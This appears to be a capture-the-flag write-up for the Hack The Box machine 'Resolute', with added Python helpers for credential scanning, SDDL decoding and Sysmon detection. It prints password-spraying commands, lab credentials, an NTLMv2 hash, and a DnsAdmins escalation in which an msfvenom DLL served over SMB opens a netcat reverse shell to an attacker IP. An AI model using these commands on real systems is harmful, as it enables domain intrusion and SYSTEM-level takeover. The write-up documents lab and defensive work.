
Resolute was a fun 30 point box created by egre55. It starts out by finding a set of credentials via SMB enumeration, which allows you to password spray and find that the password has been reused, allowing you to log in via WinRM and get the user flag. You then find a second set of credentials in a PowerShell transcript file, log in again via WinRM with those credentials, and finally abuse that user's group privileges (DnsAdmins, reached through a nested group) to get root.
User.txt
Nmap
A quick nmap scan reveals the following ports:
# nmap -sT -p- --min-rate 5000 10.10.10.169
Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-11 15:20 EST
Nmap scan report for 10.10.10.169
Host is up (0.017s latency).
Not shown: 65511 closed ports
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
5985/tcp open wsman
9389/tcp open adws
47001/tcp open winrm
Focusing on the more important ports we get the following information:
# nmap -sV -sC -T4 -p 53,88,135,139,389,445 10.10.10.169
PORT STATE SERVICE VERSION
53/tcp open domain?
| fingerprint-strings:
| DNSVersionBindReqTCP:
| version
|_ bind
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2020-01-11 20:33:30Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: megabank.local, Site: Default-First-Site-Name)
445/tcp open microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: MEGABANK)
Host script results:
|_clock-skew: mean: 2h46m57s, deviation: 4h37m09s, median: 6m56s
| smb-os-discovery:
| OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
| Computer name: Resolute
| NetBIOS computer name: RESOLUTE\x00
| Domain name: megabank.local
| Forest name: megabank.local
| FQDN: Resolute.megabank.local
|_ System time: 2020-01-11T12:34:03-08:00
| smb-security-mode:
| account_used: <blank>
| authentication_level: user
| challenge_response: supported
|_ message_signing: required
| smb2-security-mode:
| 2.02:
|_ Message signing enabled and required
| smb2-time:
| date: 2020-01-11T20:34:05
|_ start_date: 2020-01-11T11:05:42
SMB
Running nullinux with the -users flag presents you with a list of users and their associated group memberships:
# nullinux -users 10.10.10.169
[*] Enumerating Domain Information for: 10.10.10.169
[+] Domain Name: MEGABANK
[+] Domain SID: S-1-5-21-1392959593-3013219662-3596683436
[*] Enumerating querydispinfo for: 10.10.10.169
abigail
Administrator
angela
annette
annika
claire
claude
DefaultAccount
felicia
fred
Guest
gustavo
krbtgt
marcus
marko
melanie
naoki
paulo
per
ryan
sally
simon
steve
stevie
sunita
ulf
zach
[*] Enumerating enumdomusers for: 10.10.10.169
Administrator
Guest
krbtgt
DefaultAccount
ryan
marko
sunita
abigail
marcus
sally
fred
angela
felicia
gustavo
ulf
stevie
claire
paulo
steve
annette
annika
per
claude
melanie
zach
simon
naoki
[*] Enumerating LSA for: 10.10.10.169
[*] Performing RID Cycling for: 10.10.10.169
[*] Testing 10.10.10.169 for Known Users
[*] Enumerating Group Memberships for: 10.10.10.169
[+] Group: Enterprise Read-only Domain Controllers
[+] Group: Domain Admins
Administrator
[+] Group: Domain Users
Administrator
DefaultAccount
krbtgt
ryan
marko
sunita
abigail
marcus
sally
fred
angela
felicia
gustavo
ulf
stevie
claire
paulo
steve
annette
annika
per
claude
melanie
zach
simon
naoki
[+] Group: Domain Guests
Guest
[+] Group: Domain Computers
MS02$
[+] Group: Domain Controllers
RESOLUTE$
[+] Group: Schema Admins
Administrator
[+] Group: Enterprise Admins
Administrator
[+] Group: Group Policy Creator Owners
Administrator
[+] Group: Read-only Domain Controllers
[+] Group: Cloneable Domain Controllers
[+] Group: Protected Users
[+] Group: Key Admins
[+] Group: Enterprise Key Admins
[+] Group: DnsUpdateProxy
[+] Group: Contractors
ryan
Make note of the user ryan in the Contractors group.
Further enumerating SMB, I decided to run enum4linux; it provided some interesting information in the account description field of one of the users:
# enum4linux -a 10.10.10.169
=============================
| Users on 10.10.10.169 |
=============================
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 866.
<REDACTED>
index: 0x10b1 RID: 0x19cb acb: 0x00000010 Account: marcus Name: (null) Desc: (null)
index: 0x10a9 RID: 0x457 acb: 0x00000210 Account: marko Name: Marko Novak Desc: Account created. Password set to Welcome123!
index: 0x10c0 RID: 0x2775 acb: 0x00000010 Account: melanie Name: (null) Desc: (null)
<REDACTED>
You can see the marko account Desc contains Account created. Password set to Welcome123!.
Password Spraying
The credentials marko / Welcome123! didn't work for any of the services (Kerberos, SMB, and WinRM), but a password set at account creation is a good candidate for reuse, so we can password spray it with crackmapexec and see if any other account still has it. Check the lockout policy first (for example crackmapexec smb 10.10.10.169 --pass-pol, which works over a null session when the DC allows one); one password against every user stays well under any sane threshold, but it is the one check that stops a spray from locking out the domain.
I added all the users from the nullinux output into a file and passed it to the -u flag with crackmapexec:
# crackmapexec smb 10.10.10.169 -u users.txt -p 'Welcome123!'
CME 10.10.10.169:445 RESOLUTE [*] Windows 10.0 Build 14393 (name:RESOLUTE) (domain:MEGABANK)
CME 10.10.10.169:445 RESOLUTE [-] MEGABANK\Administrator:Welcome123! STATUS_LOGON_FAILURE
CME 10.10.10.169:445 RESOLUTE [-] MEGABANK\DefaultAccount:Welcome123! STATUS_LOGON_FAILURE
CME 10.10.10.169:445 RESOLUTE [-] MEGABANK\krbtgt:Welcome123! STATUS_LOGON_FAILURE
CME 10.10.10.169:445 RESOLUTE [-] MEGABANK\ryan:Welcome123! STATUS_LOGON_FAILURE
CME 10.10.10.169:445 RESOLUTE [-] MEGABANK\marko:Welcome123! STATUS_LOGON_FAILURE
CME 10.10.10.169:445 RESOLUTE [-] MEGABANK\sunita:Welcome123! STATUS_LOGON_FAILURE
CME 10.10.10.169:445 RESOLUTE [-] MEGABANK\abigail:Welcome123! STATUS_LOGON_FAILURE
CME 10.10.10.169:445 RESOLUTE [-] MEGABANK\marcus:Welcome123! STATUS_LOGON_FAILURE
CME 10.10.10.169:445 RESOLUTE [-] MEGABANK\sally:Welcome123! STATUS_LOGON_FAILURE
CME 10.10.10.169:445 RESOLUTE [-] MEGABANK\fred:Welcome123! STATUS_LOGON_FAILURE
CME 10.10.10.169:445 RESOLUTE [-] MEGABANK\angela:Welcome123! STATUS_LOGON_FAILURE
CME 10.10.10.169:445 RESOLUTE [-] MEGABANK\felicia:Welcome123! STATUS_LOGON_FAILURE
CME 10.10.10.169:445 RESOLUTE [-] MEGABANK\gustavo:Welcome123! STATUS_LOGON_FAILURE
CME 10.10.10.169:445 RESOLUTE [-] MEGABANK\ulf:Welcome123! STATUS_LOGON_FAILURE
CME 10.10.10.169:445 RESOLUTE [-] MEGABANK\stevie:Welcome123! STATUS_LOGON_FAILURE
CME 10.10.10.169:445 RESOLUTE [-] MEGABANK\claire:Welcome123! STATUS_LOGON_FAILURE
CME 10.10.10.169:445 RESOLUTE [-] MEGABANK\paulo:Welcome123! STATUS_LOGON_FAILURE
CME 10.10.10.169:445 RESOLUTE [-] MEGABANK\steve:Welcome123! STATUS_LOGON_FAILURE
CME 10.10.10.169:445 RESOLUTE [-] MEGABANK\annette:Welcome123! STATUS_LOGON_FAILURE
CME 10.10.10.169:445 RESOLUTE [-] MEGABANK\annika:Welcome123! STATUS_LOGON_FAILURE
CME 10.10.10.169:445 RESOLUTE [-] MEGABANK\per:Welcome123! STATUS_LOGON_FAILURE
CME 10.10.10.169:445 RESOLUTE [-] MEGABANK\claude:Welcome123! STATUS_LOGON_FAILURE
CME 10.10.10.169:445 RESOLUTE [+] MEGABANK\melanie:Welcome123!
[*] KTHXBYE!
You can see the credentials melanie / Welcome123! succeeded.
Flag
You can simply WinRM into Resolute and type the user flag:
# evil-winrm -i 10.10.10.169 -u melanie -p Welcome123!
Evil-WinRM shell v2.0
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\melanie\Documents> whoami
megabank\melanie
*Evil-WinRM* PS C:\Users\melanie\desktop> type user.txt
0c3be4...
Root.txt
PowerShell Transcripts
Running dir -Force allows you to list hidden files and directories:
*Evil-WinRM* PS C:\> dir -force
Directory: C:\
Mode LastWriteTime Length Name
---- ------------- ------ ----
d--hs- 12/3/2019 6:40 AM $RECYCLE.BIN
d--hsl 9/25/2019 10:17 AM Documents and Settings
d----- 9/25/2019 6:19 AM PerfLogs
d-r--- 9/25/2019 12:39 PM Program Files
d----- 11/20/2016 6:36 PM Program Files (x86)
d--h-- 9/25/2019 10:48 AM ProgramData
d--h-- 12/3/2019 6:32 AM PSTranscripts
d--hs- 9/25/2019 10:17 AM Recovery
d--hs- 9/25/2019 6:25 AM System Volume Information
d-r--- 12/4/2019 2:46 AM Users
d----- 12/4/2019 5:15 AM Windows
-arhs- 11/20/2016 5:59 PM 389408 bootmgr
-a-hs- 7/16/2016 6:10 AM 1 BOOTNXT
-a-hs- 5/29/2020 3:47 AM 402653184 pagefile.sys
You'll notice a PSTranscripts directory in C:\. PowerShell transcription records all or part of a PowerShell session to a text file, including every command the user typed and any output that appeared on the console. When it is turned on by policy, every command lands in the configured output directory, passwords typed on a command line included, which is why these files are always worth reading.
The PSTranscripts directory contains another hidden directory:
*Evil-WinRM* PS C:\PSTranscripts> dir -force
Directory: C:\PSTranscripts
Mode LastWriteTime Length Name
---- ------------- ------ ----
d--h-- 12/3/2019 6:45 AM 20191203
Changing directory and checking for more hidden files, we can see the following transcript is present:
*Evil-WinRM* PS C:\PSTranscripts\20191203> dir -force
Directory: C:\PSTranscripts\20191203
Mode LastWriteTime Length Name
---- ------------- ------ ----
-arh-- 12/3/2019 6:45 AM 3732 PowerShell_transcript.RESOLUTE.OJuoBGhU.20191203063201.txt
The file contains some interesting information but the main line that stands out is shown below:
>> ParameterBinding(Invoke-Expression): name="Command"; value="cmd /c net use X: \\fs01\backups ryan Serv3r4Admin4cc123!
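Added here as an example (not from the original post): a small Python scanner for the credential patterns that end up in PowerShell transcripts, run over a constructed transcript that includes the net use line found on the box. The patterns and the sample transcript are mine; the ParameterBinding trace format is the one shown above, and the scanner unwraps it so the patterns match the real command rather than the trace wrapper.

```python
"""Scan PowerShell transcript text for command lines that carry credentials.

Added example for this writeup, not part of the original post. Transcripts
written by Start-Transcript or the Transcription policy record commands, and
Invoke-Expression parameter-binding traces (the `>> ParameterBinding(...)`
lines) carry the expanded command string, which is where the password above
ended up. The sample transcript below is constructed; only the `net use`
line is from the box.
"""
import re
from typing import List, Tuple

# Patterns that indicate a credential on a command line, with a report label.
CRED_PATTERNS = [
    (r"\bnet\s+use\b.*\\\\\S+\s+\S+\s+\S+", "net use with user/password"),
    (r"/user:\S+", "/user: switch"),
    (r"ConvertTo-SecureString\b.*-AsPlainText", "plaintext SecureString"),
    (r"-(?:Password|Credential)\s+\S+", "-Password/-Credential argument"),
    (r"\bpsexec\b.*-p\s+\S+", "psexec -p password"),
]
_COMPILED = [(re.compile(p, re.IGNORECASE), label) for p, label in CRED_PATTERNS]

# Invoke-Expression parameter-binding traces embed the command as value="...";
# the closing quote may be missing (as in the line from the box).
_PARAM_BINDING = re.compile(
    r'ParameterBinding\([^)]*\):\s*name="Command";\s*value="(.*?)"?\s*$'
)


def extract_command(line: str) -> str:
    """Return the command embedded in a ParameterBinding trace, else the line itself."""
    m = _PARAM_BINDING.search(line)
    return m.group(1) if m else line.strip()


def find_credentials(transcript: str) -> List[Tuple[int, str, str]]:
    """Return (1-based line number, pattern label, command) for each hit."""
    hits = []
    for n, raw in enumerate(transcript.splitlines(), start=1):
        cmd = extract_command(raw)
        for rx, label in _COMPILED:
            if rx.search(cmd):
                hits.append((n, label, cmd))
                break  # one report per line is enough
    return hits


# Constructed sample: header lines mimic the transcript format; the net use
# line is the one found in C:\PSTranscripts on the box.
SAMPLE_TRANSCRIPT = """**********************
Windows PowerShell transcript start
Start time: 20191203063201
Username: MEGABANK\\ryan
**********************
PS>CommandInvocation(Invoke-Expression): "Invoke-Expression"
>> ParameterBinding(Invoke-Expression): name="Command"; value="cmd /c net use X: \\\\fs01\\backups ryan Serv3r4Admin4cc123!
PS>Get-ChildItem C:\\Users
>> ParameterBinding(Invoke-Expression): name="Command"; value="whoami /all"
"""

if __name__ == "__main__":
    for line_no, label, cmd in find_credentials(SAMPLE_TRANSCRIPT):
        print(f"line {line_no}: {label}: {cmd}")
```

Point it at every file under the transcript output directory (`Get-ChildItem -Recurse -Force` first, since the directories are hidden) and review each hit by hand; the patterns are deliberately broad, so a `-Credential $cred` hit is usually benign while a `net use` with two trailing tokens almost never is.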
Shell as Ryan
With Ryan’s credentials we can simply login again via WinRM:
# evil-winrm -i 10.10.10.169 -u ryan -p Serv3r4Admin4cc123!
Evil-WinRM shell v2.3
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\ryan\Documents> whoami
megabank\ryan
Groups
Running whoami /all as ryan presents some interesting output, particularly in the GROUP INFORMATION section:
*Evil-WinRM* PS C:\Users\ryan\Documents> whoami /all
<REDACTED>
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
========================================== ================ ============================================== ===============================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
MEGABANK\Contractors Group S-1-5-21-1392959593-3013219662-3596683436-1103 Mandatory group, Enabled by default, Enabled group
MEGABANK\DnsAdmins Alias S-1-5-21-1392959593-3013219662-3596683436-1101 Mandatory group, Enabled by default, Enabled group, Local Group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level Label S-1-16-8192
<REDACTED>
You can see that ryan is a member of Contractors and DnsAdmins.
The DnsAdmins group has a well known privilege escalation path: its members can set the DNS server's ServerLevelPluginDll parameter, and the DNS service, which runs as SYSTEM on the domain controller, loads that DLL the next time it starts, giving code execution as SYSTEM. A great article from ired.team can be found here; it describes the exploitation process in a simple and concise manner.
Nested Groups
It appears Contractors is nested inside another group, since ryan was not listed as a direct DnsAdmins member during enumeration. This can be confirmed with the following command (Get-ADGroupMember comes from the ActiveDirectory module, which is present on the DC):
*Evil-WinRM* PS C:\Users\ryan\Documents> Get-ADGroupMember -Identity 'DnsAdmins'
distinguishedName : CN=Contractors,OU=Groups,DC=megabank,DC=local
name : Contractors
objectClass : group
objectGUID : 9f2ff7be-f805-491f-aff1-3653653874d7
SamAccountName : Contractors
SID : S-1-5-21-1392959593-3013219662-3596683436-1103
Contractors is nested within the DnsAdmins group, and ryan is a member of Contractors, so he effectively has DnsAdmins group privileges. The easy way to show nested group members is by using the -Recursive flag:
*Evil-WinRM* PS C:\Users\ryan\Documents> Get-ADGroupMember -Identity 'DnsAdmins' -Recursive
distinguishedName : CN=Ryan Bertrand,OU=Contractors,OU=MegaBank Users,DC=megabank,DC=local
name : Ryan Bertrand
objectClass : user
objectGUID : 848c83e3-6cbe-4d3e-bacf-aa7bd37da691
SamAccountName : ryan
SID : S-1-5-21-1392959593-3013219662-3596683436-1105
With that confirmed, let's move on to the dns service itself.
dns service
Before attempting the exploit I wanted to check the permissions our user has over the dns service by getting the SDDL security descriptor:
C:\>sc sdShow dns
D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SO)(A;;LCRPWPDTLORC;;;S-1-5-21-1392959593-3013219662-3596683436-1105)
I created a short post recently covering SDDL security descriptors, in particular for service permissions. The ACE structure is as follows:
(ace_type; ace_flags; rights; object_guid; inherit_object_guid; account_sid)
You'll notice the SID in the last ACE matches Ryan Bertrand's SID:
(A;;LCRPWPDTLORC;;;S-1-5-21-1392959593-3013219662-3596683436-1105)
The following table contains the rights for the service (the service-specific meaning of each SDDL rights token):

| Symbol | Right |
|---|---|
| CC | SERVICE_QUERY_CONFIG |
| DC | SERVICE_CHANGE_CONFIG |
| LC | SERVICE_QUERY_STATUS |
| SW | SERVICE_ENUMERATE_DEPENDENTS |
| RP | SERVICE_START |
| WP | SERVICE_STOP |
| DT | SERVICE_PAUSE_CONTINUE |
| LO | SERVICE_INTERROGATE |
| CR | SERVICE_USER_DEFINED_CONTROL |
| SD | DELETE |
| RC | READ_CONTROL |
| WD | WRITE_DAC |
| WO | WRITE_OWNER |

Comparing the rights from the ACE to the table values we can understand the privileges a user has over a service. The most important rights in this instance are RP and WP, the ability to start and stop the dns service. Note what ryan's ACE does not contain: DC (SERVICE_CHANGE_CONFIG), so he cannot simply repoint the service binary; the plug-in DLL route through dnscmd is what turns stop/start into code execution.
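Added example (not code from the original post or from the SDDL post referenced above): a Python decoder that turns the D: section of a service descriptor into named rights per principal and answers the question being asked here, whether a given SID can stop and start the service. The token and access-mask tables are the documented Windows service constants; the descriptor it runs against is the dns one shown above, and the deny-ACE and hex-mask inputs used in the checks are constructed.

```python
"""Decode the DACL of a service security descriptor (the string printed by
`sc sdshow <service>`) into per-principal service rights.

Added example for this writeup, not code from the original post. Rights
tokens, access-mask bits and SID aliases are the documented SDDL/service
constants; DNS_SDDL is the descriptor shown above.
"""
import re
from typing import Dict, List, Set

# Two-letter SDDL access tokens interpreted for a *service* object.
SERVICE_RIGHTS: Dict[str, str] = {
    "CC": "SERVICE_QUERY_CONFIG", "DC": "SERVICE_CHANGE_CONFIG",
    "LC": "SERVICE_QUERY_STATUS", "SW": "SERVICE_ENUMERATE_DEPENDENTS",
    "RP": "SERVICE_START", "WP": "SERVICE_STOP",
    "DT": "SERVICE_PAUSE_CONTINUE", "LO": "SERVICE_INTERROGATE",
    "CR": "SERVICE_USER_DEFINED_CONTROL",
    "SD": "DELETE", "RC": "READ_CONTROL", "WD": "WRITE_DAC", "WO": "WRITE_OWNER",
    "GA": "GENERIC_ALL", "GR": "GENERIC_READ", "GW": "GENERIC_WRITE", "GX": "GENERIC_EXECUTE",
}

# Access-mask bits, used when an ACE carries a hex mask instead of tokens.
SERVICE_MASK_BITS: Dict[int, str] = {
    0x0001: "SERVICE_QUERY_CONFIG", 0x0002: "SERVICE_CHANGE_CONFIG",
    0x0004: "SERVICE_QUERY_STATUS", 0x0008: "SERVICE_ENUMERATE_DEPENDENTS",
    0x0010: "SERVICE_START", 0x0020: "SERVICE_STOP",
    0x0040: "SERVICE_PAUSE_CONTINUE", 0x0080: "SERVICE_INTERROGATE",
    0x0100: "SERVICE_USER_DEFINED_CONTROL",
    0x10000: "DELETE", 0x20000: "READ_CONTROL", 0x40000: "WRITE_DAC", 0x80000: "WRITE_OWNER",
}

# SID aliases that commonly appear in service DACLs.
SID_ALIASES: Dict[str, str] = {
    "SY": "NT AUTHORITY\\SYSTEM", "BA": "BUILTIN\\Administrators",
    "IU": "NT AUTHORITY\\INTERACTIVE", "SU": "NT AUTHORITY\\SERVICE",
    "SO": "BUILTIN\\Server Operators", "AU": "NT AUTHORITY\\Authenticated Users",
    "WD": "Everyone",
}

# Stop + start is what lets a DnsAdmins member force a fresh ServerLevelPluginDll load.
RESTART_RIGHTS = {"SERVICE_START", "SERVICE_STOP"}


def _rights(field: str) -> Set[str]:
    """Expand the rights field of an ACE (two-letter tokens or a 0x mask)."""
    if field.lower().startswith("0x"):
        mask = int(field, 16)
        return {name for bit, name in SERVICE_MASK_BITS.items() if mask & bit}
    if len(field) % 2:
        raise ValueError(f"odd-length rights field: {field!r}")
    # Unknown tokens are kept verbatim rather than silently dropped.
    return {SERVICE_RIGHTS.get(field[i:i + 2], field[i:i + 2]) for i in range(0, len(field), 2)}


def parse_dacl(sddl: str) -> List[dict]:
    """Return one dict per ACE in the D: section of an SDDL string."""
    if "D:" not in sddl:
        raise ValueError("no DACL (D:) section in descriptor")
    dacl = sddl.split("D:", 1)[1].split("S:", 1)[0]  # stop at the SACL if present
    aces = []
    for body in re.findall(r"\(([^)]*)\)", dacl):
        parts = body.split(";")
        if len(parts) != 6:
            raise ValueError(f"malformed ACE: ({body})")
        ace_type, flags, rights, _obj, _inherit_obj, sid = parts
        aces.append({
            "type": ace_type, "flags": flags, "rights": _rights(rights),
            "sid": sid, "principal": SID_ALIASES.get(sid, sid),
        })
    return aces


def effective_rights(sddl: str, sid: str) -> Set[str]:
    """Rights `sid` (alias or S-1-... string) ends up with after explicit deny
    ACEs are subtracted. Group membership is not resolved here, so a right
    granted to a group the SID belongs to will not appear."""
    allowed: Set[str] = set()
    denied: Set[str] = set()
    for ace in parse_dacl(sddl):
        if ace["sid"] != sid:
            continue
        if ace["type"] == "A":
            allowed |= ace["rights"]
        elif ace["type"] == "D":
            denied |= ace["rights"]
    return allowed - denied


def can_restart(sddl: str, sid: str) -> bool:
    """True if the principal holds both SERVICE_START and SERVICE_STOP."""
    rights = effective_rights(sddl, sid)
    return RESTART_RIGHTS <= rights or "GENERIC_ALL" in rights


# The DNS service descriptor from `sc sdshow dns` above; the last ACE is ryan's SID.
DNS_SDDL = ("D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)"
            "(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SO)"
            "(A;;LCRPWPDTLORC;;;S-1-5-21-1392959593-3013219662-3596683436-1105)")
RYAN_SID = "S-1-5-21-1392959593-3013219662-3596683436-1105"

if __name__ == "__main__":
    for ace in parse_dacl(DNS_SDDL):
        print(f"{ace['type']} {ace['principal']}: {', '.join(sorted(ace['rights']))}")
    print("ryan can stop/start dns:", can_restart(DNS_SDDL, RYAN_SID))
```

The decoder deliberately does not expand group membership: it tells you what an explicit SID holds, which is exactly the case here (ryan's SID appears by itself in the descriptor). For a principal that only inherits rights through a group you would feed it each group SID from `whoami /groups` in turn.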
DnsAdmins
As described by Microsoft:
Members of DNSAdmins group have access to network DNS information. The default permissions are as follows: Allow: Read, Write, Create All Child objects, Delete Child objects, Special Permissions. This group exists only if the DNS server role is or was once installed on a domain controller in the domain.
The management of the DNS service is done using the DNS Server Management Protocol
:
The Domain Name Service (DNS) Server Management Protocol defines RPC interfaces that provide methods for remotely accessing and administering a DNS server. It is a client/server protocol based on RPC that is used in the configuration, management, and monitoring of a DNS server.
The Microsoft tool dnscmd is a command-line interface for managing DNS servers. This tool will allow us to change the DNS server's /serverlevelplugindll parameter, which specifies the path of a custom plug-in.
The syntax is /serverlevelplugindll <dllpath>, with dllpath specifying the fully qualified path name of a valid DNS server plug-in. We can pass a UNC path to this parameter, allowing us to load a custom DLL from our remote host. The value is stored under HKLM\SYSTEM\CurrentControlSet\Services\DNS\Parameters\ServerLevelPluginDll and is only read when the service starts, which is why the stop and start rights confirmed above matter.
The following article was written by Shay Ber and describes the attack in great detail, it can be found here.
Exploiting DnsAdmins
Referring to the ired.team article, the exploit process I used is shown below.
First, I uploaded nc64.exe to a world-writable directory - C:\programdata. I then created a simple DLL with msfvenom that runs a nc reverse shell:
# msfvenom -p windows/x64/exec cmd='C:\programdata\nc64.exe 10.10.14.45 443 -e cmd.exe' -f dll > nc.dll
Next, I configured the dns service to use this new remote DLL located on my attacking host (using the FQDN from running Get-ADComputer -Filter *):
dnscmd Resolute.megabank.local /config /serverlevelplugindll \\10.10.14.45\reso\nc.dll
After that you can double check it configured successfully:
Get-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Services\DNS\Parameters\ -Name ServerLevelPluginDll
ServerLevelPluginDll : \\10.10.14.45\reso\nc.dll
PSPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\DNS\Parameters\
PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\DNS
PSChildName : Parameters
PSDrive : HKLM
PSProvider : Microsoft.PowerShell.Core\Registry
I then started a local SMB server using the smbserver.py script from Impacket (making sure the nc.dll is in the correct share):
# python smbserver.py reso /root/reso
Then you simply need to stop and start the dns service (the plug-in is loaded at service start, so the stop/start, not the config change, is what triggers the DLL load):
sc.exe \\Resolute.megabank.local stop dns
sc.exe query dns
sc.exe \\Resolute.megabank.local start dns
You should receive output like the following in the smbserver.py terminal:
[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
[*] Incoming connection (10.10.10.169,53729)
[*] AUTHENTICATE_MESSAGE (MEGABANK\RESOLUTE$,RESOLUTE)
[*] User RESOLUTE\RESOLUTE$ authenticated successfully
[*] RESOLUTE$::MEGABANK:4141414141414141:7e044e15e6bafcdee2496aec467f2908:0101000000000000808bb4567fc9d501f473f5841e6b768a00000000010010006a0079004500510043006a0064006b000200
100079006c0073004c00610049004c006d00030010006a0079004500510043006a0064006b000400100079006c0073004c00610049004c006d0007000800808bb4567fc9d5010600040002000000080030003000000000
000000000000000040000014da554f47382d1774e0f1ec3fb500b69d0e2a875f126a359ad6d37aef84b82b0a001000000000000000000000000000000000000900200063006900660073002f00310030002e0031003000
2e00310034002e00340035000000000000000000
[*] Disconnecting Share(1:IPC$)
[*] Disconnecting Share(2:RESO)
[*] Handle: [Errno 104] Connection reset by peer
[*] Closing down connection (10.10.10.169,53729)
[*] Remaining connections []
This confirms that the dns service has hit our smbserver and grabbed the DLL; the share is authenticated to by the machine account RESOLUTE$, because dns.exe runs as SYSTEM. You should then receive a netcat reverse shell fairly quickly:
# nc -nlvp 443
listening on [any] 443 ...
connect to [10.10.14.45] from (UNKNOWN) [10.10.10.169] 56589
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
nt authority\system
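From the defender's side, as an added example that is not part of the original writeup: the one artefact this technique cannot avoid is the registry write to ServerLevelPluginDll, so the Python below pulls Sysmon Event ID 13 (RegistryEvent: value set) records out of exported XML and rates the new path. The Sysmon events are constructed to mirror the dnscmd change above (the Image field, timestamps and the second event's BootMethod write are assumptions); the registry path is the one checked with Get-ItemProperty earlier.

```python
"""Flag writes to the DNS ServerLevelPluginDll registry value in Sysmon
Event ID 13 (RegistryEvent: value set) records.

Added detection example for this writeup, not part of the original post.
The sample events are constructed in Sysmon's XML layout; the registry path
is the one shown by Get-ItemProperty above.
"""
import re
import xml.etree.ElementTree as ET
from typing import Dict, List

NS = {"e": "http://schemas.microsoft.com/win/2004/08/events/event"}
# The value dnscmd /config /serverlevelplugindll writes.
TARGET_RE = re.compile(r"\\Services\\DNS\\Parameters\\ServerLevelPluginDll$", re.IGNORECASE)
UNC_RE = re.compile(r"^\\\\[^\\]+\\")  # \\host\share\...
SYSTEM32_DLL_RE = re.compile(r"^(?:%SystemRoot%|C:\\Windows)\\System32\\[^\\]+\.dll$", re.IGNORECASE)


def _event_data(event: ET.Element) -> Dict[str, str]:
    """Collapse <EventData><Data Name=...> children into a dict."""
    return {d.get("Name", ""): (d.text or "") for d in event.findall("e:EventData/e:Data", NS)}


def classify(details: str) -> str:
    """Severity of a new plug-in path: a UNC or non-System32 path is the attack shape."""
    if not details:
        return "info"      # value cleared: cleanup or remediation
    if UNC_RE.match(details):
        return "critical"  # DLL fetched from a remote share, as on this box
    if SYSTEM32_DLL_RE.match(details):
        return "medium"    # plausible for a real plug-in, still needs a change record
    return "high"          # local DLL outside System32


def find_plugin_dll_writes(sysmon_xml: str) -> List[Dict[str, str]]:
    """One finding per Sysmon EID 13 event that sets ServerLevelPluginDll."""
    root = ET.fromstring(sysmon_xml)
    findings = []
    for ev in root.findall("e:Event", NS):
        if ev.findtext("e:System/e:EventID", default="", namespaces=NS) != "13":
            continue
        data = _event_data(ev)
        if not TARGET_RE.search(data.get("TargetObject", "")):
            continue
        details = data.get("Details", "")
        findings.append({
            "time": data.get("UtcTime", ""),
            "computer": ev.findtext("e:System/e:Computer", default="", namespaces=NS),
            "image": data.get("Image", ""),
            "details": details,
            "severity": classify(details),
        })
    return findings


# Constructed sample events in Sysmon's XML layout (not captured from the box).
# Event 1 mirrors the dnscmd change made above; events 2 and 3 are noise.
SAMPLE_SYSMON = r"""<Events>
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
 <System><EventID>13</EventID><Computer>Resolute.megabank.local</Computer></System>
 <EventData>
  <Data Name="EventType">SetValue</Data>
  <Data Name="UtcTime">2020-01-11 20:41:07.113</Data>
  <Data Name="Image">C:\Windows\System32\dns.exe</Data>
  <Data Name="TargetObject">HKLM\System\CurrentControlSet\Services\DNS\Parameters\ServerLevelPluginDll</Data>
  <Data Name="Details">\\10.10.14.45\reso\nc.dll</Data>
 </EventData>
</Event>
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
 <System><EventID>13</EventID><Computer>Resolute.megabank.local</Computer></System>
 <EventData>
  <Data Name="EventType">SetValue</Data>
  <Data Name="UtcTime">2020-01-11 20:42:00.000</Data>
  <Data Name="Image">C:\Windows\System32\svchost.exe</Data>
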